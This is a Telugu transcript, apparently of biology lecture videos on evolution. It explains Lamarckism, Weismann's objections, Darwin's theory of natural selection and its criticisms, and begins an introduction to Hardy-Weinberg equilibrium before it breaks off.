బొరియలలో నివసించడానికి వీలుగా ఏం చేసినాయి, ఆ ఉపాంగాలు, పూర్వాంగాలు చర్మాంగాలు వాటి యొక్క ఆవశ్యకత లేదు కాబట్టి వాటిని ఉపయోగించుకుంటాం తగ్గించినాయి. ఆ తగ్గించేటటువంటి క్రమంలో ఏమైంది, క్రమక్రమంగా ఆ అవయవాలు క్షీణించి ఆ ఉపాంగాలు లేనటువంటి పాములు అభివృద్ధి చెందినని ఆయన వాదన. సో ఈ రెండింటిని ఉదాహరణగా లామార్క్ పేర్కొనడం జరిగింది. సో జిరాఫీ మనం పట్టణంలో చూస్తే కనుక ఇక్కడ అంతకుముందు ప్రారంభంలో ఈ జిరాఫీ కూడా ఈ లేళ్ళు దుప్పుల్లాగానే సాధారణంగా మైదానాల్లో ఉన్న గడ్డిని తీసుకునేది. తర్వాత క్రమక్రమంగా చెట్ల ఆకులను తినేటటువంటి క్రమంలో మెడను చాచటం మరియు పూర్వాంగాలను కూడా చాచటం అనేటువంటి ప్రక్రియ కారణంగా పొడవైనటువంటి మెడగల జిరాఫీ అభివృద్ధి చెందింది ఆయన వాదన. సో లామార్కిజానికి అభ్యంతరాలు తీసుకుంటే కనుక లామార్క్ చెప్పినటువంటి సిద్ధాంతాలని అగస్ట్ వీజ్మన్ అనేటువంటి శాస్త్రవేత్త నిర్ద్వందంగా తోసిపుచ్చాడు. ఆయన ప్రతిపాదించినటువంటి సిద్ధాంతం ఏంటంటే బీజద్రవ్య సిద్ధాంతం. ఆయన చెప్పేది ఏంటంటే జీవుల దేహంలో ఉండేటువంటి దైహిక కణాలలో ఉండేటటువంటి ద్రవ్యాన్ని దేహద్రవ్యం అంటారు, లైంగిక కణాలలో ఉండేటటువంటి ద్రవ్యాన్ని బీజద్రవ్యం అంటారు. ఈ బీజద్రవ్యంలో సంభవించేటటువంటి మార్పులు మాత్రమే అనువంశికత చెందుతాయి అని పేర్కొంటాడు. ఆయన ఏం చేశాడు, ఉదాహరణగా లామార్క్ సిద్ధాంతం తప్పు అని నిరూపించడానికి ఎలుకలు తీసుకుని ఒక 30 తరాల పాటు తోకను కత్తిరించి వేశాడు. ఇప్పుడు లామార్క్ చెప్పినట్టు తోక అనేది నిరుపయోగమైనప్పుడు తర్వాతి తరంలో తోక అనేది అభివృద్ధి చెందకూడదు కదా, కానీ అలా జరగలేదు. 30 తరాలు చేసినప్పటికీ 31వ తరంలో తిరిగి ఎలుకకు తోకతో పుట్టడం అనేది జరిగింది. ఆ రకంగా అగస్ట్ వీజ్మన్ అనేటువంటి శాస్త్రవేత్త లామార్క్ సిద్ధాంతాన్ని కొన్ని అంశాల దృష్టి ఏంటి ఉపయుక్త నిరుపయుక్త సూత్రం దృష్ట్యా మాత్రం ఇది సాధ్యము కానటువంటి అంశం, అంటే విజ్ఞాన శాస్త్ర పరంగా తీసుకున్నప్పుడు ఇది సాధ్యము కానటువంటి అంశం అని చెప్పడం లేదు. కానీ నియో లామార్కిజం అనేటటువంటి అంశాన్ని తీసుకుని శాస్త్రవేత్తలు ఏం చేశారంటే లామార్క్ చెప్పినటువంటి వైవిధ్యాలు మరియు ప్రకృతి ప్రభావం ఈ రెండు అంశాలని పరిగణలోకి తీసుకుని అవి సాధ్యమైనటువంటి అంశాలు, అంటే అవి నిరూపణ యోగ్యమైనటువంటి అంశాలు. ప్రతి జీవి పైన ప్రకృతి ప్రభావం ఉంటుంది. ప్రకృతిలో మార్పుల కారణంగా అవయవాలలో మార్పులు వస్తాయి, అవయవాలలో మార్పుల కారణంగా వైవిధ్యాలు సంభవిస్తాయి. వైవిధ్యం అనేది పరిణామానికి మూల ప్రమాణం కాబట్టి ఆ వైవిధ్యం కారణంగా పరిణామం సాధ్యపడుతుందని తర్వాత కాలంలో నియో లామార్కిజం అని శాస్త్రవేత్తలు నిరూపణ చేయడం అనేది జరిగింది. సో లామార్క్ సిద్ధాంతాన్ని క్రోడీకరించి కనుక మనం చూస్తే కనుక ఈ మొత్తం ఇప్పుడు చెప్పినటువంటి అంశాలన్నింటినీ కూడా మనం ఇక్కడ చూడవచ్చు ఒకే చార్ట్లో. మొట్టమొదట సంభవించేది జీవుల అంతర్గత అవసరాలు. అంతర్గత అవసరాలు వాతావరణంలో ఉన్నటువంటి మార్పులకు దారితీస్తాయి. వాతావరణ మార్పుల్లో దారితీయడం వల్ల కొత్త అవసరాలు ఏర్పడతాయి. కొత్త అవసరాలు అవయవాల నిరుపయుక్తత, అవయవాల ఉపయుక్తతకు దారితీస్తాయి. ఉపయుక్తత కారణంగా అవయవం అభివృద్ధి చెందుతుంది, నిరుపయుక్తత కారణంగా అవయవం అదృశ్యమవుతుంది. చివరికి ఇది ఆర్జిత గుణాల అనువంశికత దారితీసి కొత్త జాతుల ఆవిర్భావానికి దారితీస్తుంది. సో ఈ పాఠ్యాంశం నుంచి మనకు వచ్చేటటువంటి ప్రశ్నలు తీసుకుంటే కనుక లామార్కిజం గురించి ఒక వ్యాసం రాయండి, ఎస్ఐ క్వశ్చన్ రావచ్చు. ఉపయుక్తత సూత్రాన్ని ఉదాహరణతో వివరించండి, 5 మార్కుల ప్రశ్న రావచ్చు. ఆర్జిత గుణాల అనువంశికతను గురించి చర్చించండి. ఆ ప్రశ్నకి రెండింటినీ కలిపి మనం ఆన్సర్ రాస్తాం. థ్యాంక్ యూ.
జీవ పరిణామానికి సంబంధించి రెండవ సిద్ధాంతం, రెండవ ప్రతిపాదన చార్లెస్ డార్విన్ ప్రతిపాదించేటువంటి డార్వినిజం గురించి చూద్దాం. సో డార్వినిజం ఈ పాఠ్యాంశం యొక్క ఉద్దేశం ఏంటంటే డార్వినిజం అంటే ఏంటో తెలుసుకోబోతాం. అదే మాదిరిగా ఇందాక చెప్పుకున్నట్లు లామార్కిజం యొక్క విశిష్టత చెప్పినట్లుగానే డార్వినిజం యొక్క విశిష్టతను కూడా చర్చించడం అనేది జరుగుతుంది. సో చార్లెస్ రాబర్ట్ డార్విన్ ఒక ఇంగ్లీష్ శాస్త్రవేత్త. ఈయన ఏం చేశారంటే హెచ్ఎంఎస్ బీగల్ అనేటువంటి నౌకపై 5 సంవత్సరాల పాటు ప్రపంచంలోని అనేక ఖండాలు, ద్వీపకల్పాలు సందర్శించి కొత్త జీవుల ఆవిర్భావానికి సంబంధించి ఏదైతే మౌలిక అంశాలు లామార్క్ ఏదైతే చెప్పున్నాడో చెప్పిన దానికి రుజువుల కోసం ప్రయత్నం చేసేటటువంటి క్రమంలో కొత్త జాతులను పరిశీలించడం అనేది జరిగింది. సో ఈ పటంలో చూస్తే కనుక చార్లెస్ డార్విన్ ఆయన ప్రయాణించినటువంటి హెచ్ఎంఎస్ బీగల్ అనేటువంటి నౌక యొక్క నమూనా, తర్వాత ప్రపంచంలో ఆయన పర్యటించినటువంటి ప్రాంతాలు ఈ రెడ్ లైన్లో కనుక చూస్తే కనుక ఇట్లా ఈ మొత్తం అంతా ప్రపంచంలో ఉన్నటువంటి అన్ని ఐలాండ్స్, ద్వీపాలు, ద్వీపకల్పాలు అన్నింటినీ సందర్శించడం జరిగింది. సో డార్విన్ ఏం చేశాడంటే తన సిద్ధాంతాన్ని జాతుల పుట్టుక, ఆరిజిన్ ఆఫ్ స్పీషీస్ అంటాం అనేటటువంటి వ్యాసంలో ప్రతిపాదించారు. 1859లో డార్విన్ తను కనుగొన్నటువంటి విషయాలను ది ఆరిజిన్ ఆఫ్ స్పీషీస్ బై న్యాచురల్ సెలెక్షన్ అనేటువంటి గ్రంథంగా ప్రచురించారు. సో డార్వినిజంలోనేటువంటి ముఖ్య అంశాలు తీసుకుంటే కనుక 6 అంశాలని ప్రామాణికంగా తీసుకుని డార్వినిజాన్ని ప్రతిపాదించడం జరిగింది. మొదటిది అత్యుత్పత్తి లేదా అధిక ఫలన శక్తి. రెండోది ప్రకృతిలో ప్రతి జాతి జనాభాలో స్థిరత్వం. మూడోది మనుగడ కోసం పోరాటం. నాలుగోది వైవిధ్యాలు. ఐదోది ప్రకృతి వర్ణం. 6 అల్టిమేట్గా జాతుల ఉత్పత్తి. సో ఈ 6 మౌలిక అంశాల మీద డార్విన్ క్షుణ్ణంగా పరిశోధనలు చేసి, క్షుణ్ణంగా పరిశీలన చేసి, ప్రపంచంలో ఉన్నటువంటి వేరువేరు ప్రాంతాల్లో పరిశీలనలు చేసి ఈ 6 అంశాలను క్రోడీకరించి, ఈ 6 అంశాలను విశ్లేషణపూర్వకంగా వివరించి ఈ జీవ పరిణామానికి సంబంధించి డార్వినిజాన్ని ప్రతిపాదన అనేది చేయటం జరిగింది. సో మొదటి ఈ 6 అంశాలని మనం చర్చించాం. ఫస్ట్ అంశం అత్యుత్పత్తి లేదా అధిక ఫలన శక్తి. ప్రతి జాతి కూడా ఏం చేస్తుందంటే తన జాతి యొక్క మనుగడ సాగించడానికి వీలుగా జనాభాను జామితీయ రీతిలో, జామెట్రికల్ రేషియోలో ఇంక్రీజ్ చేసుకుంటూ ఉంటుంది, పెంచుకుంటూ వెళ్తుంది. ఉదాహరణ తీసుకుంటే కనుక పారామీషియం మరియు ఏనుగు 2 ఎగ్జాంపుల్స్ చెప్పాను, ఇక్కడ చాలా ఉంటాయి. మొదటగా తీసుకుంటే కనుక పారామీషియం ద్విధావిచ్చితి జరుపుకోవటానికి 3 సార్లు ద్విధావిచ్చి జరపడానికి 48 గంటలు పడుతుంది. సో ఒక 9,000 తరాలు అంటే 9,000 జనరేషన్స్ కనుక ద్విధావిచ్చితి జరుపుకుంటే భూమి యొక్క విస్తీర్ణం కన్నా 10,000 రెట్లు అధికంగా పారామీషియంలు భూమండలం మీద అంతా ఉంటాయి. అలాగే ఏనుగు అతి ఎక్కువ గర్భావధి కాలం ఉంటుంది. దానికి కూడా ఒక 900 తరాలు తీసుకుంటే కనుక భూమండలం మొత్తం కూడా ఏనుగులే విస్తరించి ఉండాలి. కానీ అలా జరగటం లేదు. దానికి కారణం ఏంటంటే నెక్స్ట్ చెప్పాడు ఆయన. మొదట చెప్పినటువంటి అంశం ఏంటంటే ప్రతి జాతి కూడా తన జాతిని బతికించుకోవడానికి, తన జాతిని వ్యవస్థలో, జీవావరణ వ్యవస్థలో కొనసాగించడానికి వీలుగా ఏం చేస్తుందంటే అధిక ప్రత్యుత్పత్తి అనేటటువంటి ప్రక్రియని చేపట్టుతుంది. అధిక ప్రత్యుత్పత్తి అనేటటువంటి ప్రక్రియ అంతర్గతంగా నిర్మితమైనటువంటి ఏదైతే అంశం ఉందో దానిని కొనసాగించడానికి ప్రయత్నం చేస్తుంది. అట్లాగే పరాన్నజీవులు కావచ్చు, సాధారణ జీవులు కావచ్చు, ఏవైనా సరే మొదట చేసేటటువంటి అంశం ఏంటంటే ప్రత్యుత్పత్తిని అధికంగా, సంతానాన్ని అధికంగా ఉత్పత్తి చేయడానికి ప్రయత్నం చేయటం. రెండవది స్థిరత్వం. అధికంగా ఉత్పత్తి చేసినంత మాత్రాన అన్ని జీవులు అలాగే ఉంటున్నాయంటే ఉండటంలా. కారణం ఏంటంటే దానికి ప్రతి జాతి జనాభా స్థిరంగా ఉంటుంది. అది కూడా డార్విన్ చెప్పాడు. ఉత్పత్తి అధికంగా అవుతుంది కానీ జనాభా స్థిరంగా ఉండదు. దానికి కారణం ఏంటంటే పిల్ల జీవులు ప్రత్యుత్పత్తి దశకు చేరుకోగానే పెద్ద జీవులు మరణించటం. మనం జీవావరణ పిరమిడ్డు లేదంటే కనుక వయోవృద్ధి పిరమిడ్లను చూసాం. దాంట్లో చూసినప్పుడు ప్రత్యుత్పత్తి పూర్వదశ జీవులు, ప్రత్యుత్పత్తి దశ జీవులు, ప్రత్యుత్పత్తి పరదశ జీవులు అని 3 రకాల జీవులుగా వర్గీకరించడం జరిగింది. సో జనాభా ఎందుకు స్థిరంగా ఉంది అనేది మనం పరిగణలోకి కనుక తీసుకుంటే
ప్రత్యుత్పత్తి దశకు కనుక సాధారణ జీవులు అంటే చిన్న జీవులు ప్రత్యుత్పత్తి దశకు చేరుకున్నప్పుడు ఆ జనాభాలో ఉన్నటువంటి ప్రత్యుత్పత్తి పరదేశ జీవులు తొలగించబడతాయి, అంటే మరణించడం జరుగుతుంది. ఆ కారణంగా ప్రతి జాతి యొక్క జనాభా స్థిరంగా ఉంటుందని ఆయన ప్రతిపాదించాడు. తర్వాత మూడో అంశం మనుగడ కోసం పోరాటం, స్ట్రగుల్ ఫర్ ఎగ్జిస్టెన్స్ అంటాం దీన్నే. ఇప్పుడు జనాభా అధికమైంది, అధిక జనాభాతో పాటుగా జనాభా కూడా నిర్దిష్టంగా అట్టిపెట్టబడింది. దాంతోపాటుగా ఈ అధిక జనాభా ఫలితంగా జీవుల మధ్య గట్టి పోటీ ఏర్పడుతుంది. ఈ పోటీనే డార్విన్ ఏమని పేర్కొన్నారంటే మనుగడ కోసం పోరాటం అని ప్రతిపాదించాడు. సో మనుగడ కోసం పోరాటం మనకి 3 రకాలుగా కనిపిస్తుంది. ఒకటి జాత్యాంతర పోరాటం, ఒకే జాతికి చెందినటువంటి జీవుల మధ్య జరిగేటటువంటి పోటీ. రెండోది జాతి పోరాటం, వేరు జాతులకు చెందినటువంటి జీవుల మధ్య జరిగే పోటీ. మూడోది వాతావరణంతో పోరాటం. సో ఈ 3 కూడా జీవులు ఎల్లప్పుడూ ఎదుర్కొనేటటువంటి పోరాటాలు. అంటే అవి ఆ వ్యవస్థలో, ఆ జీవావరణ వ్యవస్థలో మనుగడ సాగించడానికి వీలుగా అవి చేసేటటువంటి నిరంతర శరీర ధర్మపరమైనటువంటి క్రియలు కావచ్చు, లేదంటే కనుక బాహ్య వాతావరణంలో సంబంధించిన మార్పులకు అనుగుణంగా అవి పొందేటటువంటి మార్పులు కూడా కావచ్చు. సో మొదటగా జాత్యంతర పోరాటం చూద్దాం. ఒకే జాతికి చెందినటువంటి జీవుల మధ్య జరిగే పోరాటం, దీనిని జాత్యంతర పోరాటం అంటాం. ఇది దేనికోసం జరుగుతుంది? సాధారణంగా ఆహారం కోసం కానీ ప్రత్యుత్పత్తిలో సంగమం కోసం కానీ జరుగుతుంది. రెండోది జాతి పోరాటం, వేరు జాతులకు చెందిన జీవుల మధ్య పోరాటం. ఇది ప్రధానంగా ఆహారం కోసం జరుగుతూ ఉంటుంది. మూడోది వాతావరణంతో పోరాటం. జీవులు నిరంతరం ప్రకృతి వైపరీత్యాలతో పోరాడుతూనే ఉంటాయి. వైపరీత్యం అంటే ప్రత్యేకంగా మనం ఏం చెప్పుకోకర్లా, వాతావరణంలో సంభవించేటటువంటి మార్పే. ఈ మార్పుకు అనుగుణంగా గనక జీవి గనక మార్పు గనక చెందకపోతే అది ఆ వ్యవస్థ నుంచి తొలగించబడుతుంది. కాబట్టి అవి పోరాటం చేయాలి. వైవిధ్యం ఏమొచ్చింది, వాతావరణంలో ఏ మార్పు సంభవించింది, ఆ సంభవించిన మార్పుకు అనుగుణంగా అది ఏ రకంగా మార్పుని శరీరధర్మపరంగా కావచ్చు లేదా నిర్మాణ రీత్యా కావచ్చు ఏ రకమైనటువంటి మార్పులు పొందిందో చూసుకోవాలి. అది నెక్స్ట్. తర్వాత వైవిధ్యాలు. అంతకుముందు లామార్క్ చెప్పున్నాడు, ఇక్కడ డార్విన్ కూడా వైవిధ్యాల గురించి మాట్లాడడం జరిగింది. సో ప్రతి జాతికి చెందిన జీవులన్నిటిలోనూ వైవిధ్యాలు ఏర్పడతాయి. వైవిధ్యాలు ఉపయుక్తంగాను నిరుపయుక్తంగాను ఉండవచ్చు. ఉపయుక్త వైవిధ్యాలు ప్రకృతి వలన రక్షింపబడతాయి. సో అంతకుముందు లామార్క్ చెప్పినటువంటి మాటలు ఇక్కడ కూడా వాడటం జరిగింది. ఉపయుక్తం, నిరుపయుక్తం. మార్పు, వైవిధ్యం అనేది సాధ్యపడింది, వైవిధ్యం అనేది జరిగిన దాంట్లో ఏదైతే ఉపయుక్తం, ఉపయోగపడేటటువంటి వైవిధ్యం ఉంది చూసారా, అది ప్రకృతి చేత రక్షింపబడతాయి. ఈ మాట లామార్క్ వాడలేదు, డార్వినే వాడాడు. ఇక్కడ రోల్ ఆఫ్ ఎన్వైరన్మెంట్, ప్రకృతి యొక్క పాత్రను డార్విన్ వివరించడం వలన డార్విన్ సిద్ధాంతం ఆమోదయోగ్యమైంది. శాస్త్రవేత్తలు అంటే కారణాన్ని అన్వేషించి రుజువు చేయగలిగాడు. వేరే లామార్క్ వచ్చేసరికి చెప్పగలిగాడు తప్పితే రుజువు, నిరూపణ అనేది చేయలేపాడు. ఇద్దరికి మధ్య తేడా అది. సో ఇక్కడ ఏం చెప్తున్నాడు, ఏదైతే ఉపయుక్త వైవిధ్యం ఉంది చూసారా, ఆ ఉపయుక్త వైవిధ్యం ప్రకృతి వలన రక్షింపబడతాయి. అంటే దానిని సెలెక్ట్ చేసుకుంటుంది. నెక్స్ట్ వస్తుంది చూడండి మనకి. సో దీన్నే ప్రకృతి వర్ణం అంటాం. డార్వినిజం ప్రకారం ఉపయుక్త అనుకూల వైవిధ్యాలు గల జీవులు మాత్రం ప్రకృతి వర్ణం, అంటే ప్రకృతి చేత ఎంపిక చేయబడతాయి, సెలెక్ట్ చేయబడతాయి. దీనినే యోగ్యతమాల సార్థక జీవనం అంటాం, సర్వైవల్ ఆఫ్ ది ఫిట్టెస్ట్ అంటాం. సో డార్విన్ ఈ కంక్లూజన్కి వచ్చేసిన తర్వాతే డార్విన్ సిద్ధాంతం యొక్క ఆమోదయోగ్యత అంటే దానికి మన యాక్సెప్టెన్స్ అనేది అధికమైంది. ఏ రకంగా మారింది, మారినటువంటి మార్పుకు అనుగుణంగా అది ఎలా మనుగడ సాగించిందంటే మళ్ళీ అగైన్ ఏం తీసుకొచ్చారు, వాతావరణం లేదా ప్రకృతి అనేది దాన్ని సెలెక్ట్ చేసుకుంటుంది. కాబట్టి అది తర్వాత తరాలకు అందజేయబడుతుంది, జాతిలో మార్పు వస్తుంది అనేది చెప్పడం అనేది, వివరించడం అనేది జరిగింది. సో దాన్ని ఏమన్నారు, యోగ్యతమాల సాధక జీవనం అంటారు. నెక్స్ట్ లాస్ట్ అంశం డార్విన్ చెప్పిన దాంట్లో జాతుల ఉత్పత్తి. సో అంతకుముందు ఉన్నటువంటి అధిక ఫలన శక్తి కావచ్చు, జనాభాలో స్థిరత్వం కావచ్చు, మనుగడ కోసం పోరాటం కావచ్చు, వైవిధ్యాలు కావచ్చు, ఇవన్నీ కలిస్తే అల్టిమేట్గా కొత్త జాతుల యొక్క ఆవిర్భావం అనేది జరుగుతుంది. సో దీంట్లో ఏం చెప్పారు, మనుగడ కోసం పోరాటం ఫలితంగా
ఏర్పడిన జీవులు మరింతగా వాతావరణానికి అనుకూలంగా మారతాయి. ఏదైతే అనుకూలత పొందిందో ఇంకా వాతావరణానికి అనుకూలతగా మారుతుంది. ఈ జీవులలో వైవిధ్యాల వలన తెగ మార్పు జరుగుతుంది. జాతి మార్పు అనేది ఫస్ట్ వాడలేదు, మనం గుర్తుపెట్టుకోవాల్సిన అంశం. కొత్త జాతి పుడతా ఉందని చెప్పట్లేదు. జాతికి సంబంధించి ఉపజాతులు, దానే తెగ, చిన్న మార్పు ఉంటుంది. ఆ మార్పు కారణంగా ప్రత్యుత్పత్తి పరంగా వేరు చేయబడుతుంది, ఐసోలేట్ చేయబడుతుంది, తర్వాత వస్తుందన్నమాట. ఆ మార్పు కారణంగా తెగ మార్పు అన్నాం, జాతి మార్పు అన్న తెగ, చిన్న మార్పు, అదేదే వైవిధ్యం. ఈ మార్పుల సంచిత ప్రభావంతో ప్రకృతి వర్ణం వల్ల కొత్త జాతులు ఉత్పత్తి జరుగుతుంది. సో ఈ మార్పుల సంచిత ప్రభావం అంటే ఈ ఏదైతే చిన్న చిన్న మార్పులు వచ్చినాయో ఈ మార్పుల కారణంగా ప్రకృతి వర్ణం వలన, అంటే ఏదైతే మనం ఇందా చెప్పుకున్నాం, ప్రకృతి ఎంపిక చేసుకుంటుంది, అవసరమైనటువంటి లక్షణాలు కలిగిన జీవులను గుర్తించి వాటిని వాతావరణంలో అట్టి పెట్టుకుంటుంది, ఆ వ్యవస్థలో మిగతా వాటిని తొలగిస్తుంది. ఆ కారణంగా కొత్త జాతుల ఉత్పత్తి జరుగుతుందని డార్విన్ ప్రతిపాదించడం అనేది జరిగింది. కానీ డార్వినిజానికి కూడా అభ్యంతరాలు వచ్చినాయి. ఏమేమి ఆయన వివరించలేనిది ఏంటి? తరచూ మారే చిన్న చిన్న వైవిధ్యాలను గుర్తి వివరించింది, కానీ దైహిక వైవిధ్యాలకు బీజ వైవిధ్యాలకు మధ్య భేదం గుర్తించలేదు. లామార్క్ ఎలా అభ్యంతరాలు వచ్చినాయి, డార్వినిజానికి కూడా అభ్యంతరాలు వచ్చినాయి. దాంట్లో మొదట చెప్పింది ఏంటంటే దైహిక వైవిధ్యాలు, బీజ వైవిధ్యాలు, అంటే దైహిక కణాల్లో జరిగేటువంటి మార్పులు బీజ కణాల్లో జరిగేటువంటి మార్పులకి మధ్య డిఫరెన్స్ని వివరించలేదని ఇది. అట్లాగే అవశేష అవయవాల గురించి వివరించాల. లామార్కిజంలో అయితే అవయవాలు నిరుపయుక్తంగా ఉండే అవశేష అవయవాలు ఉండిపోయాయని చెప్పారు. బట్ డార్వినిజం దాని గురించి అవి ఏమవుతాయి, ఏంటి, ఎందుకైనాయి అనేది వివరించలేకపోయింది. తర్వాత డార్విన్ ప్రధాన అంశం యోగ్యతమాల సాధక జీవనం అని చెప్పారు, కాదంటల్లా. కానీ ఎలా ఏర్పడుతున్నాయి, ఏ కారణంగా ఏర్పడుతున్నాయి అనేది వివరించలేకపోయింది. తర్వాత కొన్ని జీవులలో ప్రత్యేక శరీర భాగాల గురించి వివరించలేదు. అంటే ఇదేదైతే మనం యోగ్యతమాల సాధక జీవనం తీసుకున్నామో ఆ యోగ్యతమాల సాధక జీవనంలో కొన్ని అవయవాలు గరిష్టంగా అభివృద్ధి చెందాయి. ఎందువలన అభివృద్ధి చెందాయి, ఏ కారణంగా అభివృద్ధి చెందాయి అని వివరించడంలో కూడా డార్విన్ విఫలమయ్యారు. అట్లాగే ఉపయుక్త భావాల ఆవిర్భావం, మాధ్యమిక రూపాలను గురించి వివరించలేదు. ఏ అయితే ఉపయుక్తంగా జీవికి ఉపయుక్తంగా ఉన్నటువంటి అవయవాలను పేర్కొన్నామో ఆ ఉపయుక్త అవయవాలు ఏ రకంగా ఎందుకు ఏర్పడినవి అంతకుముందు అక్కడైతే కనుక చెప్పున్నాడు లామార్క్. దాంట్లో శరీర ధర్మం పైన మార్పు, బాహ్య నిర్మాణంలో మార్పులు సంభవిస్తుంది. బట్ ఇక్కడ ఆ వివరణ అనేది సమంగా చేయలేదు. తర్వాత సహానుకూలత ద్వారా ఏర్పడిన భాగాలను వివరించలేదు. కోఎడాప్టేషన్, ఒక అనుకూలత వచ్చింది, ఒక లక్షణానికి సంబంధించి ఈ ఎడాప్షన్, ఈ అనుకూలత అనేది పొందింది. దాంతోపాటుగా ఇంకొక లక్షణంలో కూడా చిన్న మార్పు అనేది సంభవించవచ్చు. అది ఎందువలన సంభవించింది, ఎందువలన మారింది, ఆ తెగగా ఎందుకు ఏర్పడింది అనేది విశ్లేషించడంలో డార్విన్ విఫలమయ్యారన్నమాట. తర్వాత స్థూల వైవిధ్యాలు, సూక్ష్మ, ఇప్పుడు లక్షణాలు, చిన్న చిన్న లక్షణాల గురించి వివరం జరిగింది. పెద్ద బాహ్యంగా సంభవించినటువంటి పరిమాణాన్ని గుర్తించదగినటువంటి మార్పులకు సంబంధించిన మార్పుల గురించి వివరించలేకపోయింది. తర్వాత కొత్త జీవులకు ప్రాచీన జీవులకు మధ్య ఉండు మాధ్యమిక రూపాలను గురించి వివరించలేదు. సో ఇంటర్మీడియట్ అంటే మధ్యస్థంగా కొన్ని రూపాలు ఉంటాయి, ఆ మధ్యస్థ రూపాలను గురించి ఎక్కడా కూడా డార్విన్ ప్రస్తావించలేదు. సో ఇవన్నీ కూడా డార్విన్ సిద్ధాంతానికి సంబంధించినటువంటి అభ్యంతరాలు. సో డార్విన్ సిద్ధాంతాన్ని కనుక మనం ఇప్పుడు చెప్పినటువంటి అంశాన్ని మొత్తం కనుక మనం ఒక నక్షల్లో చూస్తే కనుక మొదట చెప్పినటువంటి ప్రత్యుత్పత్తి సామర్థ్యం, పరిసరాల ఒత్తిడి, ఈ రెండూ కలిస్తే మనం చూసేది మనుగడ కోసం పోరాటం. ఆ మనుగడ కోసం పోరాటంలో వైవిధ్యాలు పొందుతాయి. ఈ వైవిధ్యాలు పొందినటువంటి వైవిధ్యాలు ప్రకృతి ఎంపిక చేసుకుంటుంది, దాన్ని ప్రకృతి వర్ణం అంటాం. ఈ ప్రకృతి వర్ణం వాతావరణ మార్పులు కలిసి పరిణామానికి దారితీస్తే అని డార్విన్ చెప్పినటువంటి డార్వినిజంగా మనం దీని యొక్క సారాంశంగా మనం తీసుకొనవచ్చు. సో ఈ పాఠం నుంచి వచ్చేటువంటి ప్రశ్నలు తీసుకుంటే కనుక డార్వినిజం గురించి ఒక వ్యాసం రాయండి, మనుగడ కోసం పోరాటంను చర్చించండి, యోగ్యతమాల సాధక జీవనంను వివరించండి, ప్రకృతి వర్ణంను చర్చించండి. సో మొదటిదేమన్నా ఎస్ఏ క్వశ్చన్ వస్తుంది, మిగతా 3 షార్ట్ క్వశ్చన్లు. థ్యాంక్ యూ.
సో జీవ పరిణామానికి సంబంధించి ఇందాక లామార్కిజం, డార్వినిజం చూసాము. ఇప్పుడు డార్విన్ చెప్పినటువంటి అంశాలన్నింటినీ క్రోడీకరించి అందులో వాదనలను బలపరుస్తూ నియో డార్వినిజం, నూతన పరిణామ సంశ్లేషణ సిద్ధాంతం అనే దాన్ని వివరిస్తూ దానికి సంబంధించి కొన్ని అంశాలను వేరు శాస్త్రవేత్తలు ప్రతిపాదించడం జరిగింది. అందులో ముఖ్యమైనటువంటి అంశం లేదా ముఖ్యమైనటువంటి సూత్రం ఏంటంటే హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి లేదా హార్డీ-వెయిన్బెర్గ్ ఈక్విలిబ్రియం అంటారు. సో జీవ పరిణామంలో యూనిట్ లెవెల్ అంటే సూక్ష్మ స్థాయికి వెళ్ళి విశ్లేషించినటువంటి సూత్రం ఈ హార్డీ-వెయిన్బెర్గ్ సూత్రం. ఇందాక మనం లామార్కిజం కానీ డార్వినిజం కానీ తీసుకున్నప్పుడు కంటికి కనిపించేటటువంటి మార్పులు ఏ రకంగా అనువంశికత చెందుతాయి, ఈ మార్పుల కారణంగా మనం పరిణామాన్ని ఏ రకంగా గుర్తించవచ్చు అనేది వివరించారు. కానీ ఇప్పుడు చూసేటటువంటి హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి లేదా హార్డీ-వెయిన్బెర్గ్ ఈక్విలిబ్రియం మనం ఏం చూస్తామంటే పౌనఃపున్యాలు, జన్యు పౌనఃపున్యాలకు సంబంధించి ఆ పౌనఃపున్యాలలో సంభవించేటటువంటి మార్పులు కారణంగా పరిణామం సాధ్యమా కాదా, ఎలా ఆ జన్యు పౌనఃపున్యాలలో మార్పులు సంభవిస్తాయి, మార్పులు సంభవించేందుకు అవకాశం ఉందా అనేదాన్ని మనం విశ్లేషించడం అనేది జరుగుతుంది ఇక్కడ. సో హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి ఈ పాఠ్యాంశం యొక్క ఉద్దేశం ఏంటంటే ఈ హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి గురించి మనం ఎనాలిసిస్ చేద్దాం, విశ్లేషణ చేద్దాం. అసలు హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి అంటే ఏంటి, దాంట్లో ఏ రకమైనటువంటి చరరాశులు ఉంటాయి, ఆ చరరాశులకి ఏ రకమైన విలువలు ఉంటాయి, ఏ విలువ ఇస్తే కనుక దాంట్లో మార్పులు సంభవిస్తాయని చూద్దాం. సో మొదటగా ఈ హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి గురించి మనం అధ్యయనం చేసేటప్పుడు ఇది ఒక ప్రాబబుల్ అంటే సంభావ్యత మాత్రమే, ల్యాబొరేటరీ ప్రయోగశాలలో సాధ్యపడేటటువంటి అంశం, ప్రయోగశాలలో ఉన్నటువంటి జనాభాకు సంబంధించిన అంశమే. సహజ జనాభాలో హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి సాధ్యము కాదు అని మనం దృష్టిలో పెట్టుకోవాలి. అంటే శాస్త్రవేత్తలు జన్యు పౌనఃపున్యాల గురించి లెక్కించడానికి, జన్యు పౌనఃపున్యాలు ఏ రకంగా ఉంటాయి ఒక జనాభాలో అనే దాన్ని విశ్లేషించడానికి సంబంధించి ఒక ప్రయోగపూర్వక నిరూపణ చేసినటువంటి సూత్రమే ఈ హార్డీ-వెయిన్బెర్గ్ సూత్రం అనేది మనం దృష్టిలో పెట్టుకోవాలి. సో హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి యొక్క నిర్వచనం తీసుకుంటే కనుక హార్డీ-వెయిన్బెర్గ్ సమతాస్థితి జనాభాలోని యుగ్మ వికల్పాల పౌనఃపున్యానికి లేదా జన్యు పౌనఃపున్యానికి సంబంధించినది. ఇంతకుముందు మనం లామార్క్ సిద్ధాంతంలో కానీ డార్విన్ సిద్ధాంతం కానీ బయటకు కనిపిస్తున్నాయి, జిరాఫీ మెడ అన్నాం లేకపోతే ఎలుకల్లో తోకలు అన్నాం అవి చెప్పాం. బట్ ఇవి కంటికి కనిపించినటువంటి జీవ పరిణామ ప్రమాణాలు. సో దాని గురించి ఈ 